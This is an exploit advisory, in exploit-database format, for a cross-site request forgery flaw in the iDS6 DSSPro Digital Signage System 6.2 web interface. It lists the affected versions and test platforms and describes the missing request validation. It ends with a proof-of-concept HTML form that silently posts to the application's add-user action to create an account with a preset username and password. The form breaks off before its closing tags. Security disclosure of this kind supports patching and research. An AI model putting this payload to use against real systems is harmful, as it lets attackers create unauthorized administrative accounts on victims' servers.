# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage:
# Version: 6.2

iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)

Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page:
Affected version: V6.2 B2014.12.12.1220
                  V5.6 B2017.07.12.1757

Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Microsoft Windows XP
           Microsoft Windows 7
           Microsfot Windows Server 2008
           Microsoft Windows Server 2012
           Microsoft Windows 10
           Apache Tomcat/8.0.44
           Apache Tomcat/6.0.35
           Apache Axis/1.4
           MySQL 5.5.25
           Java 1.8.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2020-5606
Advisory URL:



Add user:

    <form action="!addUser" method="POST">
      <input type="hidden" name="user.userName" value="testingus" />
      <input type="hidden" name="user.password" value="zeroscience" />
      <input type="submit" value="add()" />